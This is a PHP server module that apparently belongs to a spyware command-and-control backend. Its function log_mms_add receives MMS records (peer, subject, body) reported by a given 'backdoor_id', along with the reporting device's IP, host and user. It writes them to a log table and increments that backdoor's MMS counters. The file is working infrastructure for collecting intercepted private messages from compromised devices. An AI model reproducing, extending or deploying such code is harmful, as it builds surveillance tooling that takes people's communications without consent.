<?php

//////////
///
///   log_mms.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_mms.add'] = array('func'   => 'log_mms_add',
                           'perm'   => AL_SERV,
                           'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_mms_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= peer
   // varchar2  <= subject
   // varchar3  <= -
   // varchar4  <= -
   // int1      <= -
   // int2      <= -
   // int3      <= -
   // longtext1 <= body
   // longblob1 <= -

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`longtext1`) ";
   $sql .= "VALUES ('$backdoor_id', 'MMS', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      $params = array(array('t' => 'i', 'v' => $log['flags']),
                      array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                      array('t' => 's', 'v' => $log['peer']),
                      array('t' => 's', 'v' => $log['subject']),
                      array('t' => 's', 'v' => $log['body']));

      $ret = db_execute($stmt, $params);

      if(!is_success($ret)) {
         return $ret;
      }

      $sql  = "UPDATE `stat` ";
      $sql .= "SET `mms` = `mms` + 1, ";
      $sql .=     "`mms_new` = `mms_new` + 1 ";
      $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
